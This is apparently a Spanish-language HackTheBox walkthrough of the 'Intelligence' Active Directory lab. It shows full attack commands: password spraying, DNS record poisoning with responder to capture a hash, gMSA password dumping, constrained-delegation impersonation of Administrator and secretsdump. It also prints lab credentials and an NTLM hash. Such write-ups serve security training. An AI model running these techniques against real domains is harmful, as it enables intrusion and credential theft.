$

Intelligence

2025-04-11 · #ctf#hackthebox#active-directory#windows

Intelligence
Sistema operativo Dificultad Fecha de Lanzamiento Creador
Windows Medium 03 Julio 2021 Micah

Escaneo de puertos

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.248
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-11 22:41 -03
Initiating SYN Stealth Scan at 22:41
Scanning 10.10.10.248 [65535 ports]
Discovered open port 80/tcp on 10.10.10.248
Discovered open port 53/tcp on 10.10.10.248
Discovered open port 139/tcp on 10.10.10.248
Discovered open port 135/tcp on 10.10.10.248
Discovered open port 445/tcp on 10.10.10.248
Discovered open port 49667/tcp on 10.10.10.248
Discovered open port 49717/tcp on 10.10.10.248
Discovered open port 636/tcp on 10.10.10.248
Discovered open port 49692/tcp on 10.10.10.248
Discovered open port 389/tcp on 10.10.10.248
Discovered open port 9389/tcp on 10.10.10.248
Discovered open port 49711/tcp on 10.10.10.248
Discovered open port 88/tcp on 10.10.10.248
Discovered open port 3268/tcp on 10.10.10.248
Discovered open port 593/tcp on 10.10.10.248
Discovered open port 49691/tcp on 10.10.10.248
Discovered open port 49740/tcp on 10.10.10.248
Discovered open port 3269/tcp on 10.10.10.248
Discovered open port 464/tcp on 10.10.10.248
Completed SYN Stealth Scan at 22:42, 27.46s elapsed (65535 total ports)
Nmap scan report for 10.10.10.248
Host is up, received user-set (0.21s latency).
Scanned at 2025-04-11 22:41:44 -03 for 28s
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49691/tcp open  unknown          syn-ack ttl 127
49692/tcp open  unknown          syn-ack ttl 127
49711/tcp open  unknown          syn-ack ttl 127
49717/tcp open  unknown          syn-ack ttl 127
49740/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.54 seconds
           Raw packets sent: 131064 (5.767MB) | Rcvd: 32 (1.408KB)

Enumeración de versión y servicio

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49667,49691,49692,49711,49717,49740 -oN servicesScan 10.10.10.248
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-11 22:43 -03
Nmap scan report for 10.10.10.248 (10.10.10.248)
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-12 08:43:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-12T08:45:09+00:00; +7h00m17s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-12T08:45:07+00:00; +7h00m17s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-12T08:45:09+00:00; +7h00m17s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-12T08:45:07+00:00; +7h00m17s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49711/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC
49740/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-12T08:44:31
|_  start_date: N/A
|_clock-skew: mean: 7h00m16s, deviation: 0s, median: 7h00m16s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.84 seconds

Explotación inicial

HTTP (80)

Intelligence

Intelligence

echo '10.10.10.248 intelligence.htb dc.intelligence.htb' >> /etc/hosts

Intelligence

Si miramos el contenido del archivo no revela nada interesante, pero si miramos los metadatos con exiftool nos encontramos con dos posibles nombres de usuario.

Intelligence

Creamos un script para automatizar la descarga de archivos.

import requests

def download():
    for month in range(1, 13):
        for day in range(1,32):
            dd = f"0{day}" if day < 10 else day
            mm = f"0{month}" if month < 10 else month
            filename = f"2020-{mm}-{dd}-upload.pdf"
            res = requests.get(f"http://10.10.10.248/documents/{filename}")

            if res.status_code == 200:
                print(f"[+] Archivo Encontrado {filename}")
                with open(f"documents/{filename}", 'wb') as f:
                    f.write(res.content)

if __name__ == '__main__':
    download()

exiftool documents/*.pdf | grep 'Creator' | awk -F: '{print $2}' | sed 's/\s//g' | sort -u | tee ad_users.txt
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee

Intelligence

Intelligence

Crear un script para extraer el contenido de los archivos PDF.

import os
import pdftotext
from pwn import *
import time

p1 = log.progress("Reading Files...")
time.sleep(2)

for entry in os.scandir("./documents"):
    if not entry.name.startswith(".") and entry.is_file():
        with open(entry.path, "rb") as f:
            pdf = pdftotext.PDF(f)

            p1.status(f"Reading File {entry.name}")

            for page in pdf:
                with open("pdfs_text.txt", "a") as file_wordlist:
                    file_wordlist.write(page)

p1.success("Completed")

Intelligence

Ahora con esa wordlist podemos hacer un password spraying.

nxc smb 10.10.10.248 -u ad_users.txt -p wordlist.txt --continue-on-success

Intelligence

Intelligence

Enumeramos recursos compartidos

Intelligence

Intelligence

Intelligence

smbclient //10.10.10.248/Users -U 'Tiffany.Molina%NewIntelligenceCorpUser9876'

Intelligence

Intelligence

Movimiento Lateral

Enumeramos con LDAP

Intelligence

Intelligence

Intelligence

Enumeramos a través de Bloodhound

Intelligence

Intelligence Luego de enumerar y no encotrar una vía posible, retornamos al script downdetector.ps1.

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

Este script comprueba que todos los sitios web esten activos, en caso de que alguno este “caido” envia un mail a el usuario Ted.Graves.

La solicitud al sitio web se realiza usando credenciales por defecto, por lo que si registramos un registro dns que apunte a nuestra máquina, tal vez podamos obtener esas credenciales.

python3 dnstool.py -u intelligence.local\\tiffany.molina -p 'NewIntelligenceCorpUser9876' -r webfake.intelligence.htb -d 10.10.14.2 --action add 10.10.10.248

Intelligence

Nos ponemos en escucha con responder.

responder -I tun0

Intelligence

Capturamos el hash de Ted.Graves.

Intelligence

Crackeamos el hash.

Intelligence

Intelligence Intelligence

Una GMSA es un tipo especial de cuenta de servicio que se usa para correr servicios o tareas programadas en máquinas de dominio sin necesidad de administrar manualmente las contraseñas.

  • La contraseña de estas cuentas no la pone un admin, sino que la controlan y cambian automáticamente los Domain Controllers.
  • Ciertos equipos o grupos del dominio pueden consultar esa contraseña para usarla y correr servicios como si fueran esa cuenta.

Entonces, acá te dice que: - Existe una GMSA llamada SVC_INT$.
- El grupo ITSUPPORT tiene permiso para obtener la contraseña de esa cuenta.

El uso previsto de una GMSA es permitir que ciertas cuentas de equipo puedan recuperar la contraseña de la GMSA, y luego ejecutar servicios locales usando esa cuenta.
Un atacante que controle una de esas cuentas autorizadas puede abusar de ese privilegio para suplantar a la GMSA

En este caso, usare la herramienta gMSADumper.py.

gMSADumper.py -u 'ted.grave' -p 'mr.teddy' -d 'intelligence.htb'

Intelligence

svc_int$:::b05dfb2636385604c6d36b0ca61e35cb

Intelligence

Escalación de privilegios root/SYSTEM

Constrained Delegation

Intelligence

Intelligence

while [ true ]; do sudo ntpdate intelligence.htb; done

impacket-getST -dc-ip 10.10.10.248 intelligence.htb/svc_int\$ -hashes :b05dfb2636385604c6d36b0ca61e35cb -impersonate Administrator -spn 'WWW/dc.intelligence.htb'

Intelligence

export KRB5CCNAME=./Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
impacket-secretsdump -k -no-pass DC.intelligence.htb

Intelligence

Intelligence

Leemos la flag de root.

Intelligence